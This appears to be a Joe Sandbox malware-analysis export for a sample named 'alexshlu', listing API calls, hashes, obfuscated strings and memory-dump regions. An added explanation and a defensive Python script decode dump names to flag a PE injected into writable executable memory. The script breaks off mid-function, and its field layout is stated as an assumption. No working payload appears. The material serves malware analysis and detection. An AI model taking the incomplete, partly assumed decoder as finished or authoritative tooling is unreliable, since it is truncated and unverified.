• Opcode ID: 9269880a45a3c80f6ec8299234c73a1314589920fa48725fb3d67ea21efaca66
• Instruction ID: 9bb2948b1e33ad1240181575e0f5375bfb099cf60bc3df2fdc322b3d55e14239
• Opcode Fuzzy Hash: 9269880a45a3c80f6ec8299234c73a1314589920fa48725fb3d67ea21efaca66
• Instruction Fuzzy Hash: CAD0C9343D83007AF5748B48ED53F1432169702F11FB00629F322FE6D4C9E07121861D
APIs
• RtlFreeHeap.NTDLL(?,00000000,00000000,00412F5C), ref: 00439B80
Memory Dump Source
• Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: d0720c9dfbe2666778a34d5469e5ae55c8d5964329e0fb1cba2b62a2f878fbc3
• Instruction ID: 8d81dc3d2e1c71e2762f942217139477682170591cb2c618f1865e02491f5b7e
• Opcode Fuzzy Hash: d0720c9dfbe2666778a34d5469e5ae55c8d5964329e0fb1cba2b62a2f878fbc3
• Instruction Fuzzy Hash: 76D0C935505126EBCA506B28BC15BC73A989F4A671F0708A1B4006A075C765EC919AD8
APIs
• RtlAllocateHeap.NTDLL(?,00000000,?,?,00414E57,00000400), ref: 00439B50
Memory Dump Source
• Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
Similarity
• API ID: AllocateHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                        • Opcode ID: a95155655fbe3eb8f0e77a05497d8175f8be12db265ae77d37b3e7249a9ffdc4
                                                                                                                                                                                                                                        • Instruction ID: 3d340f236624c1ae318c051adf9ea47d82c8c11c3707c94fc3fa8f772c7fe72e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a95155655fbe3eb8f0e77a05497d8175f8be12db265ae77d37b3e7249a9ffdc4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91C04831145224ABDA10AB15EC09B8A3AA8AF496A1F1A04A6B005660B28760AC929A98
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0043B480: LdrInitializeThunk.NTDLL(0043D4FB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B4AE
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0041A21A
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0041A29B
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                                                                                        • String ID: I,~M$PQ$cba`$cba`$cba`$wEtG$Wu
                                                                                                                                                                                                                                        • API String ID: 764372645-3643945649
                                                                                                                                                                                                                                        • Opcode ID: 47063c938c01330124c9dc59b6d375a3b8a360990f39732c0e3748d67b9dcd4f
                                                                                                                                                                                                                                        • Instruction ID: ce701afe96e54189f6fff091c8333c98f5ae15aa60c98f01a083bef101dadeb2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 47063c938c01330124c9dc59b6d375a3b8a360990f39732c0e3748d67b9dcd4f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C59235746093409FE714CF65D891B6BBBE2EBD5300F28882EE58487391D7799C81CB9B
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: z%|$"r,t$&f?x$3v#H$<b"d$=j9l$cba`$cba`$Z\$^P
                                                                                                                                                                                                                                        • API String ID: 0-3047316687
                                                                                                                                                                                                                                        • Opcode ID: 45c83a3ddc5386c7eaecb6d0721308efe7616dc8ac7a87c6f5778f813dbd46f5
                                                                                                                                                                                                                                        • Instruction ID: 146473404e5499b4986dffa8d26f26e1c07bf5215faae6f3d7194190b628d0b4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 45c83a3ddc5386c7eaecb6d0721308efe7616dc8ac7a87c6f5778f813dbd46f5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2D124B9608380DFE324DF15E88176BB7E1FBD5304F94982DE58587261D738D901CB4A
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                        • String ID: K
                                                                                                                                                                                                                                        • API String ID: 2832541153-856455061
                                                                                                                                                                                                                                        • Opcode ID: 027abc228ed841da0674a97a3735ab7f080d79d715808bd082ae78d0cbe3e8e1
                                                                                                                                                                                                                                        • Instruction ID: 513562b2ac7e6d1d4712994eff6d7c1bc04b9d90a7c3137532ed1f51a9abc6ba
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 027abc228ed841da0674a97a3735ab7f080d79d715808bd082ae78d0cbe3e8e1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34418E6150C7818ED310AF7C988826FBFE09B96224F044A6EE8E5872D2E6389549C797
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: GetLastError.KERNEL32(00000000,?,002BCF02), ref: 002BAB27
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: SetLastError.KERNEL32(00000000,?,?,00000028,002B6E76), ref: 002BABC9
                                                                                                                                                                                                                                        • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 002BFCDA
                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 002BFD18
                                                                                                                                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 002BFD2B
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 002BFD73
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 002BFD8E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                        • String ID: l#-
                                                                                                                                                                                                                                        • API String ID: 415426439-1174061122
                                                                                                                                                                                                                                        • Opcode ID: f750735201fc7f275fd2f8d7edc1ed013de19cda4fd2dab0519fd5407e84d1d0
                                                                                                                                                                                                                                        • Instruction ID: 2cf4e852554080a4c3d2c87c262529d6c3baab2c87887822b74bc044dea2082b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f750735201fc7f275fd2f8d7edc1ed013de19cda4fd2dab0519fd5407e84d1d0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA517072A2020AAFDB50DFA5DD45BFAB7B8BF04740F14457AE900E7191E770DA608B61
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 002A1000: _strlen.LIBCMT ref: 002A1067
                                                                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 002A1BE1
                                                                                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 002A1C07
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 002A1C16
                                                                                                                                                                                                                                        • _strlen.LIBCMT ref: 002A1C84
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 002A1E83
                                                                                                                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 002A1EE0
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseFileHandle_strlen$MessagePostQuitReadSize
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2365707584-0
                                                                                                                                                                                                                                        • Opcode ID: 05f905580b39da053164009eda4a1cb442d1d45d9492e7864850a4413590c097
                                                                                                                                                                                                                                        • Instruction ID: 9470c7981e5e7a9d749ac393af3d60380e6f350b45d33afe3da5fa82619ad1cb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 05f905580b39da053164009eda4a1cb442d1d45d9492e7864850a4413590c097
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 779127729243119FC314DF24D88962BBBE5FF8A360F15492EF8858B351EB34D964CB92
Strings
Memory Dump Source
• Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
Similarity
• API ID:
• String ID: );?g$9nI9$;>*2$='0{$[93=$cba`$fa
• API String ID: 0-154584671
APIs
• GetLocaleInfoW.KERNEL32(?,2000000B,002BFD08,00000002,00000000,?,?,?,002BFD08,?,00000000), ref: 002C03D0
• GetLocaleInfoW.KERNEL32(?,20001004,002BFD08,00000002,00000000,?,?,?,002BFD08,?,00000000), ref: 002C03F9
• GetACP.KERNEL32(?,?,002BFD08,?,00000000), ref: 002C040E
Strings
Memory Dump Source
• Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP
• API String ID: 2299586839-711371036
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
Similarity
• API ID: FreeLibrary
• String ID: 3$qjjw$Wu
• API String ID: 3664257935-1093458801
Strings
Memory Dump Source
• Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
Similarity
• API ID:
• String ID: #$0$AGsW$P$k
• API String ID: 0-1629916805
Memory Dump Source
• Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002C0A09
Memory Dump Source
• Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 002AD87B
• IsDebuggerPresent.KERNEL32 ref: 002AD947
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 002AD960
• UnhandledExceptionFilter.KERNEL32(?), ref: 002AD96A
Memory Dump Source
• Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
                                                                                                                                                                                                                                        • Opcode ID: ae5a2b7fd03f88a0dcead4c5380f9509c4d27864869bda5fe4dedf9cb09ec46d
                                                                                                                                                                                                                                        • Instruction ID: 5f0b3a1e9a69a5f7047e60f8f04b8c188a856ac32efe59ad1d8df2830a850a23
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae5a2b7fd03f88a0dcead4c5380f9509c4d27864869bda5fe4dedf9cb09ec46d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 723108B5D1521D9BDF21EFA4D8897CDBBB8AF08700F1041AAE40DAB250EB749B85CF45
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 1/3T$WL$^Q$neA
                                                                                                                                                                                                                                        • API String ID: 0-3205570823
                                                                                                                                                                                                                                        • Opcode ID: ba18f0a771fe5c943f6b46e4d9dfc1ae68c5ab374dcf48f97578f812035a9b14
                                                                                                                                                                                                                                        • Instruction ID: 36620dcd79f832a97b090e2ed89ea61b800e286945c25bf48684ec17d430fe28
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ba18f0a771fe5c943f6b46e4d9dfc1ae68c5ab374dcf48f97578f812035a9b14
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A9D1CEB4100B01CFD7258F25C8A1BA3BBB1FF86314F19858DC8964F7A2D779A855CB94
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: B:@<$F>?0
                                                                                                                                                                                                                                        • API String ID: 0-4011826714
                                                                                                                                                                                                                                        • Opcode ID: db013f8bcd791390b44068821e0592b044049136823266e2a0b8e4940e29ff84
                                                                                                                                                                                                                                        • Instruction ID: 92ed06d7aa227fc4673e4b6d33fedd1ff2714f2f2b1d0eb8acbab6dee258af69
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: db013f8bcd791390b44068821e0592b044049136823266e2a0b8e4940e29ff84
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E43256B1A00721CBCB24CF24C892267BBB1FF92310F59825DD8825F796E779A851CBD5
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: =UA$cba`
                                                                                                                                                                                                                                        • API String ID: 0-2849403845
                                                                                                                                                                                                                                        • Opcode ID: ac233faae9877bc3ddc3a70347ef5b8a5b0ef2ad5a4fd7cdd570c427d15c7cae
                                                                                                                                                                                                                                        • Instruction ID: b0755fcd4efdf1967727a5f4be91126eb1e252dcdfc562f5600afc0ab194aa5f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac233faae9877bc3ddc3a70347ef5b8a5b0ef2ad5a4fd7cdd570c427d15c7cae
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9402FE34608300EFD7149F24D962BABB7B1FB9A304F94582DF481972A2D775EC45CB8A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: TU$c!"
                                                                                                                                                                                                                                        • API String ID: 0-3813282519
                                                                                                                                                                                                                                        • Opcode ID: 757f52760972d6ea7efb3a276aabc71b80904803bdd1bf2a89c12d688fe9e935
                                                                                                                                                                                                                                        • Instruction ID: a4d5b8c078bf2433dc24120fb7555f1f32600d90c3be649242fb2c546733d6d2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 757f52760972d6ea7efb3a276aabc71b80904803bdd1bf2a89c12d688fe9e935
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27C16672B04310ABD714DB29ED5277BB3E2EFD5314F48852EE88587381E6BCE801875A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: pr$|~
                                                                                                                                                                                                                                        • API String ID: 0-4145297803
                                                                                                                                                                                                                                        • Opcode ID: ee8a3b8d263e0e2bc6467c896304b100a01db44200932090249312cc29dfec84
                                                                                                                                                                                                                                        • Instruction ID: 1c71e515e24bd4364ede3925d09e369eeeaf8989eca5e2d791649c7508655d54
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee8a3b8d263e0e2bc6467c896304b100a01db44200932090249312cc29dfec84
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E451F0B0A0C3509BD7008F24D8127ABB7F1EF92319F1885AEE4C55B391E7399642CB5E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: pr$|~
                                                                                                                                                                                                                                        • API String ID: 0-4145297803
                                                                                                                                                                                                                                        • Opcode ID: 1cbfd2780bc33f3a437b09008cb0e627c906c1623d91543066de9fab292285fd
                                                                                                                                                                                                                                        • Instruction ID: b30244ed6a2ff3de417c81c30de102dda9fa652a451c4e072b4a3ececf8c80cf
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1cbfd2780bc33f3a437b09008cb0e627c906c1623d91543066de9fab292285fd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B751F4B460C3509BD7009F24C8126ABB7F1EF92315F1885ADE4C55B391E739D642CB5E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: BLJB$X
                                                                                                                                                                                                                                        • API String ID: 0-2222927247
                                                                                                                                                                                                                                        • Opcode ID: 85d985c10c38fb94c5f45cecc72a4b56871a758ab7e71e90a7e49e993c96917b
                                                                                                                                                                                                                                        • Instruction ID: 1af2eb929763e148cb4abff1c4585c52a2657f08fe5d59f4d12d45bf37d2de30
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 85d985c10c38fb94c5f45cecc72a4b56871a758ab7e71e90a7e49e993c96917b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13515531708B618BD730DE6894412FBBBE1DF55350F984A3ED8D987382E23CA545E74A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: H.s $ij
                                                                                                                                                                                                                                        • API String ID: 0-4017226643
                                                                                                                                                                                                                                        • Opcode ID: 2cb1b7f925fbc6c9f7264a4edce0ffabfea3ec399ad5ab8651c95cdd20c1a345
                                                                                                                                                                                                                                        • Instruction ID: ae217f9daa6f4cce8b7d259f4259de876ba9e86de0ba8af5ed87a71d833a3b47
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2cb1b7f925fbc6c9f7264a4edce0ffabfea3ec399ad5ab8651c95cdd20c1a345
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F31DEB260D3908FD314CF65D48165FBBE2EBC6704F55892DE4C56B340CBB49906CB46
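The memory dump file names in the blocks above carry the forensic signal that matters here: the dumps taken from the image loaded at 0x2A0000 are readable-only or copy-on-write except for the code section at 0x2A1000, which is execute-read, while the dump at 0x400000 is a region the analyzer identifies as a PE that lives in memory marked 0x40 with type 0x20000. Those two values are the Windows PAGE_EXECUTE_READWRITE and MEM_PRIVATE constants, so the 0x400000 dump is a PE image in writable, executable, private memory, which the OS loader never produces; it is the manually mapped payload consistent with the "Injects a PE file into a foreign processes" signature listed for this sample. The following Python is an added example, not Joe Sandbox code: it parses the .sdmp names as they appear on this page and classifies each region. The field layout it assumes (pid . stage . sequence . base address . protection . unknown . region type . unknown) is inferred from the values listed above and is labelled as an assumption in the code; only the protection and region-type fields are decoded, against the documented Windows constants.

```python
"""Decode Joe Sandbox .sdmp memory-dump file names and flag suspicious regions.

Added example, not Joe Sandbox code. ASSUMPTION: the file name layout is
    pid.stage.sequence.baseaddress.protection.f6.regiontype.f8.sdmp
inferred from the dumps listed on this page, whose 5th and 7th fields line up
exactly with the Windows PAGE_* protection and MEM_* region-type constants.
Fields 2, 3, 6 and 8 are not documented here and are left opaque.
"""
import re
from dataclasses import dataclass

# Windows page protection constants (winnt.h); the low byte of the field.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}

# Windows region types (MEMORY_BASIC_INFORMATION.Type).
MEM_IMAGE = 0x1000000
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

# Assumed layout; every field is hex except the decimal sequence number.
SDMP_RE = re.compile(
    r"^([0-9a-f]{8})\.([0-9a-f]{8})\.(\d+)\.([0-9a-f]{16})\."
    r"([0-9a-f]{8})\.([0-9a-f]{8})\.([0-9a-f]{8})\.([0-9a-f]{8})\.sdmp$",
    re.IGNORECASE,
)

VERDICTS = {
    "image-code": "executable section of a loader-mapped module; expected",
    "image-data": "non-executable section of a loader-mapped module; expected",
    "private-pe": "PE image in executable memory the OS loader did not map: "
                  "manually mapped or injected payload",
    "exec-private": "executable private/mapped memory with no PE header: "
                    "unpacked code or shellcode candidate",
    "data": "non-executable private/mapped memory",
}
SUSPICIOUS = {"private-pe", "exec-private"}


@dataclass(frozen=True)
class DumpRegion:
    pid: int
    base: int
    protect: int
    mem_type: int
    based_on_pe: bool

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTION.get(self.protect & 0xFF, f"0x{self.protect:x}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    def is_executable(self) -> bool:
        return (self.protect & 0xFF) in EXECUTABLE

    def is_writable(self) -> bool:
        return (self.protect & 0xFF) in WRITABLE

    def verdict(self) -> str:
        if self.mem_type == MEM_IMAGE:
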